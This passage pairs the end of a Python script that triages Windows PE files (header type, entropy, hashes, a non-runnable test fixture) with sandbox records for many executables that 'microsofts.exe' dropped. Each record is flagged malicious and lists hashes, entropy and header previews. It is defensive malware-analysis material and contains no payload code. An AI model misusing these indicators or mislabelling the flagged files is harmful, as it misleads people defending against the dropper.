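    opt_off = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic == PE32PLUS_MAGIC:
        bits = "PE32+"
    elif magic == PE32_MAGIC:
        bits = "PE32"
    else:
        return f"PE with unknown optional-header magic 0x{magic:04X}"
    # Subsystem sits at optional-header offset 68 in both the PE32 and PE32+ layouts.
    subsystem = struct.unpack_from("<H", data, opt_off + 68)[0] if opt_off + 70 <= len(data) else 0
    arch = {IMAGE_FILE_MACHINE_I386: "Intel 80386", IMAGE_FILE_MACHINE_AMD64: "x86-64"}.get(
        machine, f"machine 0x{machine:04X}")
    kind = "DLL" if characteristics & IMAGE_FILE_DLL else "executable"
    ui = {2: "GUI", 3: "console"}.get(subsystem, f"subsystem {subsystem}")
    return f"{bits} {kind} ({ui}) {arch}, for MS Windows"


def triage(data: bytes) -> dict:
    """All report-style fields for one file image, plus a packed-file hint."""
    entropy = shannon_entropy_8bit(data)
    return {
        "File Type": pe_file_type(data),
        "Size (bytes)": len(data),
        "Entropy (8bit)": entropy,
        "Likely packed": entropy >= PACKED_ENTROPY_THRESHOLD,
        **file_hashes(data),
        "Preview": preview(data),
    }


def build_minimal_pe(machine: int, pe32plus: bool, subsystem: int = 2) -> bytes:
    """Constructed fixture: a header-only PE image (not runnable) for offline testing."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 112 if pe32plus else 96
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, 0x0002)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe(IMAGE_FILE_MACHINE_AMD64, True)
    for key, value in triage(blob).items():
        print(f"{key}:{value}")
```

Run it against a dropped file pulled from the sandbox (`python triage.py microsofts_drop.bin`) and compare the MD5/SHA-256 and entropy against the record above; a hash mismatch means you are not holding the same bytes the sandbox saw, and an entropy jump toward 8.0 on the same file type is the usual sign that a later stage is packed or encrypted rather than the plain 5 to 6.8 range these droppers show.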
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2199552
Entropy (8bit):6.788996425483491
Encrypted:false
SSDEEP:49152:H83pZ3kd0CuEeN0LUmRXzYs65meDmg27RnWGj:fKuUQY15dD527BWG
MD5:35A136A0B18C8C46D2A8B76396F42AC9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4D6B820BDE8428515C4E278E1F81687FE6A35411
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A5A5753B7C15985AC74FC8D4B8045E1891AE83195DC12D45B6428969DDF30879
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EE759245B13772627F4F82B4CB0E5BCBB45387F53AE1783B74A3617274CA75818706333DC2E586AA6DC99FC64F3334969D8DB3F246FE507D94C6D82B387F69F3
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......u"... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4971008
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.670831788400185
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:VErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+MV:DA4oGlcR+glEdOPKzgVZ4D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3D02AE016BA9FF25068BF5A9E5EB7BB9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A39F4201F0BED3AEF54E17499DF8BEA02F4146AE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4972CC98D0880BF029C14E39EB9E666DE4183A0D91E12D0E1ABA892149F3E981
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A66776761ACFA252A301CF581CEAE2C57CED8D4DCC55DEC235C2CC936F6177F10AF37639E9104E05F139040C6E013EC4A7CBCEA59A93358DBFE121207350866F
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L......hL... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.82975883281978
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:M8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKC:Hv2gM+qwXLg7pPgw/DSZHuD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:97F997A4DE8B41D02F5AA58C60E03677
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:69B7297A788C656ADB65DF22249CF1A2171575FA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:229289C53DB9C6FEE84F1E7957F796BB173FEBC665041F96D281B02A7C0F8917
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D9B53732F361AF1F413E7F5015AFA85CB8F7CC79F6459C1908297A9E4D6391C333A1896B001B68DC98EBD7F058015A18A3414D437F90E68E80A364368E6D460F
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.....M.K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8297589303019635
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:L8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKC:Kv2gM+qwXLg7pPgw/DSZHuD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3E02E7707093A825DFDB0D14CC7E9217
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8C966A44DBC50B2DEE6C3D5DF0465CF20D3D37D5
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:27A7A61FB5232E2C2031D265FE6813B692A35979ACDC0818FC5D1D45D87549BA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:022CB24A3FC0400A4EC79FCA0DF8200358463C2DFFDD68FD2850272F007483513AEF0C94ABBC92E9B9A35D083E7222B1A569371CC02CDAF5D1C96B35D18633DB
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2156544
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.953569859996277
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
SSDEEP:24576:etjqL8fH+8aUbp8D/8+xyWAhsqjnhMgeiCl7G0nehbGZpbD:WjKK+81FI/8z3Dmg27RnWGj
MD5:C9F2F9EF2FF061181F249E7E66972498
SHA1:5644942D39365AF36CE1F67D9016FF1624D6D501
SHA-256:CA9BB93CB293023D6AECD83A9C7B18724FCCCD8B417E53EFF22C25F9654F4B2D
SHA-512:BB55348872C37E2B6024D562632817C43C47AB0E9B417BA27329CB7C4E7AB4F973F810E6DB999BDD3A5ED8CD809990FE9AAFABD50AD908841F0377F937CAC9F7
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"....... ... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2370560
Entropy (8bit):7.03238534366217
Encrypted:false
SSDEEP:49152:eAMsOu3JfCIGnZuTodRFYKBrFDbWpFDmg27RnWGj:eAMa38ZuTS4D527BWG
MD5:3C601040EB8FAE987EF67EF219C03A85
SHA1:1FFC8950054A7C207A725D66AF1ABCD358395176
SHA-256:60D83E515282459B15318B3C6EB0CA5FB07C4794EEB1E3F2C118AF43218D709D
SHA-512:79619022A5584FA379CC7E1BE768226C28994B202471A399EF1B3CA3289AEA8BE3EAADC7C250AFB8C202A1370E0DE5435BC2E4544EE15FD5FC2D852A9923AA49
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%.....X.$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1984512
Entropy (8bit):7.104331844257692
Encrypted:false
SSDEEP:24576:vwbK7tnhD4aH6wD2Krx5NgOOagQE8JlsqjnhMgeiCl7G0nehbGZpbD:vSK7Fhslq2EPfOGEsDmg27RnWGj
MD5:F4CF372B6AF2D271140F99A26C83B2DC
SHA1:2704DE85C3EA6B85D8DF82381AFEFC7CE7DB189A
SHA-256:49D7499C8795FCD1DDDCAD11901400D92E9561AB2DF8B1ED57C4246C8186177F
SHA-512:3D65575C148266BE62372F38ACA4983E5D6F7B172FA468511C777328B87B8A9D31BBD428A3F8846C43FE918BC495079F8D6FF1F7E7374F39557DA052A59AD676
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@.....................................P.... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1779712
Entropy (8bit):7.1580594788434135
Encrypted:false
SSDEEP:24576:KKI7Twj5KDHxJ1FxyD+/wsG18bbQ1sqjnhMgeiCl7G0nehbGZpbD:Kv7e0j31mD+/wDGbaDmg27RnWGj
MD5:D9573878544A5F514FE2B505F83D4162
SHA1:98EBE322F98B8686C64DB464AD5BDB5ECEEEBBEE
SHA-256:B7C55463B6BD77B5626EDEBE68BEEA7FE3AD40C7886AB71D1E77A4303244AA6C
SHA-512:4DE686311056788B2D9FA2AA91A588BB33FE783865261AC69620F4A60107228EE6C855A7770E2A4382081BE27FFCCDC50D95E5F04B6C1671261249EE5EC85B5C
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@....................................Fn.... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1378304
Entropy (8bit):5.377431536923245
Encrypted:false
SSDEEP:12288:/QUVPDHhSKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:oyhSKsqjnhMgeiCl7G0nehbGZpbD
MD5:A475FF94B4168A7A16C3BDED37BD607D
SHA1:63A1FB75250CCB1078092414DC826038D94B6D82
SHA-256:BB7AC9B9C46FF5EF8D1D881C7BBD10BDFE1F2B9D8C882B7C19A451AC6331A5EB
SHA-512:47E5C834E74DB275299CB7888D804DE45134379E7792283A055A9BB24588B4B1D9D8762EC93C17EBF6B89C4DC6C695ED1F0DF6580F105DF02265E44D9065628A
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p......q..... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1286656
Entropy (8bit):7.222108277987428
Encrypted:false
SSDEEP:24576:IsFfc1VyFn5UQn652bO4HNsqjnhMgeiCl7G0nehbGZpbD:IsFcIn5rJ7Dmg27RnWGj
MD5:2AEBD58BBFF45DFEF8FB0A72DA0407BA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A758764BF9A55BFD6B31078FDAA953FF03E6843C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0135F22594314FAB070B64CA3E01C0D50BDDAE61FBE9E4F9B78F34AE554425FB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:193F4B8B2ED0A735B015ED903751823501814A86CB14E15A175C672A94591E06103ADFF9ACCF1198DF7B277662506DE474FFD7BD150DDF716F2C571FFF90B620
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1246208
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.494266509578081
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Vt9o6p4xQbiKI69wpemIwpel9+sqjnhMgeiCl7G0nehbGZpbD:Vt9faQbtl2peapelkDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FA73EA81C4DBA42DFA7FF58E26F8E8F9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9D8B53501D99662D1B81FBA1BF5548BD21F48D02
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:91801009169F012BE5A044DBF387FB2F5437DE709CCCC7175A987B0C474F0C11
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:605E85687891C240AC9A073C5BDF5C260138ED2F6B8A27D45F6E4BAE4A72C3C91B06C9EBF45877960D542721BE43815A200024AD0B3B4B32AA91BBD9F5BFB74D
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.......................................... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.347838841364752
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:zQVTZu0J1sqjnhMgeiCl7G0nehbGZpbD:EVTZu0Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:96F784C0CF45C5480DCCEF8C5AE28313
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9F255DB6C668495165B97C20F49AF5A7EBDC9C51
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D6DDAC6731C7E04BAA3AC2C61306D0EB26DAD4841F51AC9F013FBDDCF07CB19D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:791DE8A708130DA9D319DEA347550243199862B4A0DAFFC284F402C696A430D367BE5EC7E2043046A8AD336A15F86B1960626629C3514CF5693376357CB70FD5
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P.......J.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1344000
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.808377495048384
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:OC1vpgXcZHz3sqjnhMgeiCl7G0nehbGZpbD:OC1vpIcNLDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:04595D985D0906478EE29D38D7E602B4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:939F7C73C95B9A975804AC1F364F48CF8F2F88D2
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3E9F0564EB593DBD8E1F71C254C7F4FB18891B680FA3A82DA05FE886301D2113
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7768D4CEFB9DE33325A50FDE26C82A217D40519686CC7FCB6A39DD92A26F35FEE91809073D7B509F91B88AF8E6524761327A489FFAEB9031403AC58FE730E668
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.....................................7.... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1200128
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.140028684628899
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:GSwj7Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Gv7sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:15D38DEA1DEBAC2E345E30F813B43D12
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4739815043506407823C9CE894C4EDC5967A26CB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E003F57BB841A0589F275BEFAF0F1FA55F910EC69212FA127613637BD83678DB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DA96E37B3B7224728E0C5F65AD633569C34426D687861097E84E623C4673BB4AB492FCCC5D5AD9F4665793C9F5405FE5B1B108CCFF284A14DD85A23E358BE925
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.......................................... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1408512
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4411470466772665
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:CWKntIfGplsqjnhMgeiCl7G0nehbGZpbD:F8IeTDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9132B914522C04A1623F36FE7CCB64FA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:50A1F46DC9F890C3C7F98C0B974AF22F3CD7D26A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B6D9BDE8D1EBB1E0BC071FBBDEED51AB6A444B923715A5C32FC59B07C80B74B0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0AAE783E115DD0B9CFC44474446F698EB3EF6686E50D1115AE6C4BE7D8D89B00D23634CDD15BE79C3AC9F4845FFF8418BBAC2433AD609273ED73804EC1F28E82
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@....................................tT.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1185280
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.103280644434671
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:hIhPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbEm:cPsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:21628F0CC6C8FD7AFDF4F29716AF8A9A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6DAB7BCD7933C7DBB9D4020AFDB1A3B4B55CF35E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3077E9B9F5566143829125A188751D8695BF4B531197016532CB5BCC9E77FD9C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:661F4C30F95244250B8AFAA621D7056EFC1A77E1890F38E6CC28335882EDC3566017166E7E811D4C3B464CFDC8B006CD654C948928269CC27ADC77FBAC66B8DE
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
